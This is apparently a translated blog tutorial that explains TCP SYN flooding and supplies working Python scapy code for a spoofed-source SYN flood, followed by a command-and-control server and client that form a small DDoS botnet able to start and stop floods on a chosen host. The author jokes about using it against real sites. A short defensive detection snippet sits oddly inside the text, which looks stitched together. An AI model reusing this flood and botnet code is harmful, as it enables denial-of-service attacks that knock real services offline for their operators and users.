Background:

At the network transport layer, TCP is generally used. To establish a connection, the client first sends a SYN packet. The server receives it and replies to the client with a SYN/ACK packet. The client then responds again with an ACK packet. But here is the problem: if I am the client and send only the SYN packet, and then at the third step of the handshake never send back the ACK packet, does the server keep waiting?

During that waiting time, can I forge more requests, so that the server's resources are continuously consumed until the server stops serving?

This kind of attack is a SYN flood.
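Seen from the server's side, the condition described above is a pile of handshakes that stopped after the first SYN. As an added example (not part of the original post), this sketch counts such half-open handshakes per service over constructed packet records; the record layout, the threshold and the function names are assumptions.

```python
from collections import Counter

# Constructed sample records: (time_s, src, sport, dst, dport, tcp_flags).
# All addresses are from the RFC 5737 documentation ranges.
SAMPLE = [
    (0.00, "198.51.100.7", 40000, "192.0.2.10", 80, "S"),   # ordinary client
    (0.01, "192.0.2.10", 80, "198.51.100.7", 40000, "SA"),  # server reply
    (0.02, "198.51.100.7", 40000, "192.0.2.10", 80, "A"),   # handshake done
] + [
    # SYNs from rotating sources that never send the final ACK
    (0.10 + i * 0.01, f"203.0.113.{i % 4 + 1}", 1024 + i, "192.0.2.10", 80, "S")
    for i in range(30)
]

def half_open_counts(packets):
    """Count handshakes per (dst, dport) that stopped after the client SYN."""
    pending = set()  # (client, client_port, server, server_port)
    for _ts, src, sport, dst, dport, flags in packets:
        key = (src, sport, dst, dport)
        if flags == "S":
            pending.add(key)                      # step 1: SYN seen
        elif "R" in flags:
            pending.discard(key)                  # either side reset it
            pending.discard((dst, dport, src, sport))
        elif "A" in flags and "S" not in flags:
            pending.discard(key)                  # step 3: client ACK arrived
    return dict(Counter((dst, dport) for _, _, dst, dport in pending))

def flag_syn_floods(packets, threshold=20):
    """Return services whose half-open count reaches the assumed threshold."""
    counts = half_open_counts(packets)
    return sorted(svc for svc, n in counts.items() if n >= threshold)

if __name__ == "__main__":
    print(half_open_counts(SAMPLE))
    print(flag_syn_floods(SAMPLE))
```

The completed handshake from the ordinary client is not counted; only the SYNs that never receive a final ACK or a reset remain pending.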


SYN flood with the scapy library in Python:
Installation for Python 3: sudo pip3 install scapy-python3
Note: code that uses the scapy library must be run with root privileges.


Basic usage:

from scapy.all import *

# Define a SYN packet in the form IP()/TCP(). In IP, src is the forged
# source IP and dst is the target IP.
# In TCP, dport is the target port number (80 is common on the network);
# flags="S" marks the packet as a SYN packet.
pkt = IP(src="", dst="") / TCP(dport=80, flags="S")

# Send the packet directly with send()
send(pkt)

Let me give you an example:

#!/usr/bin/env python3
import random
import socket
import time
from scapy.all import *

# Define the SYN flood function; tgt is the target IP, dPort is the target port
def synFlood(tgt, dPort):
    # First forge 4 arbitrary IP addresses
    srcList = ['', '', '', '']
    # Pick any source port number
    for sPort in range(1024, 65535):
        index = random.randrange(4)
        # Build the IP/TCP packet as in the code above, then send it
        ipLayer = IP(src=srcList[index], dst=tgt)
        tcpLayer = TCP(sport=sPort, dport=dPort, flags='S')
        packet = ipLayer / tcpLayer
        send(packet)

domain = ""  # Define the domain name you want to attack; Baidu is not recommended, don't blame me for not reminding you
tgt = socket.gethostbyname(domain)  # Use the socket method to get the domain's IP address, i.e. DNS resolution
print(tgt)  # You can print it out and have a look
dPort = 80  # Common port number for network traffic
synFlood(tgt, dPort)  # Call the SYN flood function, which then sends the SYN packets
# After sending, you can check the response speed of the server. Usually after sending for a few minutes, the site is not accessible
# The premise is that the site is a poor one .. ha-ha
DDoS attack

And what is a DDoS attack? In fact it is similar to the SYN flood above; it is just that DDoS uses multiple clients, under the command of a server, attacking one website together, something like this

The implementation principle is the same as the SYN flood; it's just that the server can directly control the clients and have them issue the requests.

I will post the server and client code directly

Server:

import socket
import argparse
import threading

socketList = []

# Send commands to all clients
def sendCmd(cmd):
    print('Send command....')
    for sock in socketList:
        sock.send(cmd.encode())

# Wait for connections; add each established connection to socketList
def waitConnect(s):
    while True:
        sock, addr = s.accept()
        if sock not in socketList:
            socketList.append(sock)

def main():
    # Create the TCP server
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  # Set port reuse
    s.bind(('', 58868))
    s.listen(1024)
    # Create a thread that waits for connection requests
    t = threading.Thread(target=waitConnect, args=(s,))
    t.start()
    print("Wait at least a client connection!")
    while not len(socketList):  # No connection yet, wait
        pass
    print("It has been a client connection")
    while True:
        print('=' * 50)
        # Command format
        print('The command format:"#-H -p xxxx -c start"')
        # Wait for the input command
        cmd_str = input('please input cmd:')
        if len(cmd_str):
            if cmd_str[0] == '#':
                sendCmd(cmd_str)

if __name__ == '__main__':
    main()

Client:

import argparse
import socket
import sys
import os
from multiprocessing import Process
import random
from scapy.all import *

curProcess = None

# SYN flood: this is the first piece of code, copied here directly
def synFlood(tgt, dPort):
    print("=" * 100)
    print("The syn flood is running")
    print('=' * 100)
    srcList = ['', '', '', '']
    # Any source port number
    for sPort in range(1024, 65535):
        index = random.randrange(4)
        ipLayer = IP(src=srcList[index], dst=tgt)
        tcpLayer = TCP(sport=sPort, dport=dPort, flags='S')
        packet = ipLayer / tcpLayer
        send(packet)

def cmdHandle(sock, parser):
    global curProcess
    while True:
        data = sock.recv(1024).decode()
        if len(data) == 0:
            print('The data is empty')
            return
        if data[0] == '#':
            try:
                # Parse the command
                options = parser.parse_args(data[1:].split())
                m_host = options.host
                m_port = options.port
                m_cmd = options.cmd
                # print(m_cmd)
                # DDoS start command
                if m_cmd.lower() == 'start':
                    if curProcess != None and curProcess.is_alive():
                        curProcess.terminate()
                        curProcess = None
                        os.system('clear')
                    print('The synFlood is start')
                    p = Process(target=synFlood, args=(m_host, m_port))
                    p.start()
                    curProcess = p
                elif m_cmd.lower() == 'stop':
                    if curProcess.is_alive():
                        curProcess.terminate()
                        os.system('clear')
            except:
                print("Failed to perform the command")

def main():
    # Add the options to be parsed; these are the commands sent by the server
    # Command format: "#-H -p xxxx -c start"
    p = argparse.ArgumentParser()
    p.add_argument('-H', dest='host', type=str)
    p.add_argument('-p', dest='port', type=int)
    p.add_argument('-c', dest='cmd', type=str)
    print("*" * 40)
    try:
        # Create the socket object
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Because this runs locally, the IP address to connect to is the local IP address; the port is the server port
        s.connect(('', 58868))
        print('To connected server was success')
        print("=" * 40)
        # Process commands
        cmdHandle(s, p)
    except Exception as e:
        print('The network connected failed')
        print('please restart the script')
        sys.exit(0)

if __name__ == '__main__':
    main()

Then you can start the server locally, and then open the client to try it out

Remember to use sudo

When you see that the client looks like this

ha-ha, it's done.


However, in essence it is the same as the SYN flood. It's just one more layer of packaging.





©2019-2020 Toolsou All rights reserved,